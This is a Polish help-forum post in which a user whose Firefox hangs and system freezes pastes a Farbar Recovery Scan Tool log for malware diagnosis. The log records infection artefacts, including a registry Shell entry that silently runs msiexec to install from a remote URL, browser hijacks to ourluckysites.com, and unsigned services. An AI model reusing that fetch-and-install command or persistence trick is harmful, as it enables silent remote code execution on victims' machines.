• Ogłoszenie:

Problem z mozilla i zawieszającym się systemem

Bezpieczeństwo systemów, usuwanie wirusów, dobieranie programów antywirusowych. Obowiązkowe logi w tym dziale: trzy z FRST + Gmer.

Problem z mozilla i zawieszającym się systemem

Postprzez emillo2502 19 Kwi 2017, 21:01

reklama
Mozilla-częste brak odpowiedzi.System długo się urochamia i często się zawiesza.

Logi:

FRST

Kod: Zaznacz wszystko
Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 17-04-2017 01
Uruchomiony przez Emil (administrator)  LAPTOP-PH67M221 (19-04-2017 19:42:19)
Uruchomiony z C:\Users\Emil\Downloads
Załadowane profile: Emil (Dostępne profile: Emil)
Platform: Windows 10 Home Wersja 1607 (X64) Język: Polski (Polska)
Internet Explorer Wersja 11 (Domyślna przeglądarka: Edge)
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesy (filtrowane) =================

(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Windows (R) Win 7 DDK provider) C:\Windows\System32\AdminService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
() C:\Program Files (x86)\My Connection\ApplicationController.exe
() C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
(kitty.exe) C:\Users\Emil\AppData\Local\Kitty\cat.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
() C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe
(Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McTkSchedulerService.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\mcsvchost\McSvHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\VSCore_15_6\mcapexe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\2.3.253.0\McCSPServiceHost.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QASvc.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALSvc.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAgent.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALockHandler.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAdminAgent.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McUICnt.exe
() C:\OEM\Preload\FubTracking\FubTracking.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe
(Dashlane SAS) C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe
(Acer) C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe
(Acer Cloud Technology) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\Program Files (x86)\Acer\Care Center\ACCStd.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(acer) C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
() C:\Users\Emil\Downloads\5ymv7ohx.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe

==================== Rejestr (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [14040792 2015-07-07] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2398776 2016-06-15] (NVIDIA Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2017-03-28] (Microsoft Corporation)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [37296 2012-01-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [843712 2012-01-02] (Adobe Systems Incorporated)
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== /q
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: E - "E:\Setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: F - "F:\setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: {3c034b37-b73a-11e6-9da4-74dfbf750d6c} - "E:\Setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: {780173ea-b3bd-11e6-9da1-74dfbf750d6c} - "F:\setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: {bd31849f-d1b1-11e6-9dab-54ab3abfe915} - "H:\HiSuiteDownLoader.exe"
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter
ShellIconOverlayIdentifiers: [ ACloudSynced] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2015-10-15] (Acer Incorporated)
ShellIconOverlayIdentifiers: [ ACloudSyncing] -> {C1E1456F-C2D8-4C96-870D-35F1E13941EE} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2015-10-15] (Acer Incorporated)
ShellIconOverlayIdentifiers: [ ACloudToBeSynced] -> {307523FA-DDC0-4068-983F-2A6B34627744} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2015-10-15] (Acer Incorporated)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2017-04-02]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe (McAfee, Inc.)

==================== Internet (filtrowane) ====================

(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)

Hosts: 0.0.0.1   mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{178678cf-1ec5-4aeb-833f-f89587024ab7}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{dbbf9db0-56ad-4631-b98a-46ab3cfd876f}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-06] (Microsoft Corporation)
BHO: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-06] (Microsoft Corporation)
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2016-11-02] (Intel Security)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-01-03] (Adobe Systems Incorporated)
BHO-x32: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2016-11-02] (Intel Security)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2017-03-03] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2017-03-03] (McAfee, Inc.)

Edge:
======
Edge HomeButtonPage: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT

FireFox:
========
FF DefaultProfile: zao9ohxy.default
FF ProfilePath: C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default [2017-04-19]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\zao9ohxy.default -> Google
FF Homepage: Mozilla\Firefox\Profiles\zao9ohxy.default -> about:home
FF Extension: (Amazon Assistant for Firefox) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\abb-acer@amazon.com [2016-11-25]
FF Extension: (Polski Language Pack) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-03-08]
FF Extension: (Mozilla Partner Defaults) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\partnerdefaults@mozilla.com [2016-11-25]
FF Extension: (Greasemonkey) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2017-02-22]
FF Extension: (Disable TLS Certificate Transparency) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\features\{2938d360-da93-4f1a-9010-d604a1e0564b}\disable-cert-transparency@mozilla.org.xpi [2017-04-19]
FF Extension: (Disable Prefetch) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\features\{2938d360-da93-4f1a-9010-d604a1e0564b}\disable-prefetch@mozilla.org.xpi [2017-04-19]
FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2017-02-14]
FF SearchPlugin: C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\searchplugins\ourluckysites.xml [2017-04-19]
FF ProfilePath: C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default [2017-04-19]
FF Extension: (Amazon Assistant for Firefox) - C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\Extensions\abb-acer@amazon.com [2017-04-17]
FF Extension: (Polski Language Pack) - C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-04-17] [Brak podpisu cyfrowego]
FF Extension: (Greasemonkey) - C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2017-02-22]
FF Extension: (Disable Prefetch) - C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\features\{ddf68c7d-0ad0-42a3-ac01-a234b93a8b50}\disable-prefetch@mozilla.org.xpi [2017-04-04]
FF SearchPlugin: C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\searchplugins\startsearch.xml [2017-04-17]
FF Extension: (Site Deployment Checker) - C:\Program Files (x86)\Mozilla Firefox\browser\features\deployment-checker@mozilla.org.xpi [2017-03-28] [Brak podpisu cyfrowego]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2017-03-14] [Brak podpisu cyfrowego]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-04-06] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2017-03-03] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-04-06] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2017-03-03] ()
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-06] (Microsoft Corporation)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\2\NP_wtapp.dll [2017-04-08] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2012-01-03] (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx

==================== Usługi (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R2 3DM; C:\Users\Emil\AppData\Local\3DM\Kitty.dll [754688 2017-04-18] (kitty.exe) [Brak podpisu cyfrowego]
R2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
R2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [106496 2017-04-17] () [Brak podpisu cyfrowego]
R2 AtherosSvc; C:\WINDOWS\system32\AdminService.exe [355760 2016-06-26] (Windows (R) Win 7 DDK provider)
R2 CCDMonitorService; C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe [2267352 2016-08-30] (Acer Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3735744 2017-03-02] (Microsoft Corporation)
S3 ClientAnalyticsService; C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe [1701840 2016-12-08] (Intel Security)
R2 Dashlane Upgrade Service; C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe [82968 2016-04-08] (Dashlane SAS)
R2 FLAME II HSPA USB MODEM Service; C:\Program Files (x86)\My Connection\ApplicationController.exe [574464 2015-09-24] () [Brak podpisu cyfrowego]
S2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [350576 2017-04-08] (WildTangent)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [382456 2017-02-01] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
S3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [Brak podpisu cyfrowego]
R2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [Brak podpisu cyfrowego]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [223008 2015-06-24] (Intel Corporation)
R2 Kitty; C:\Users\Emil\AppData\Local\Kitty\cat.exe [357376 2017-04-14] (kitty.exe) [Brak podpisu cyfrowego]
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [188264 2017-03-27] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_15_6\McApExe.exe [989632 2017-01-23] (McAfee, Inc.)
S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [353128 2015-11-27] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.523\McCHSvc.exe [404376 2017-03-20] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\2.3.253.0\\McCSPServiceHost.exe [2053568 2016-11-16] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [1342904 2017-02-01] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [241040 2016-11-14] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [383032 2016-11-14] (McAfee, Inc.)
R3 mfevtp; C:\Windows\system32\mfevtps.exe [342768 2016-11-14] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1465840 2016-12-22] (McAfee, Inc.)
S3 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
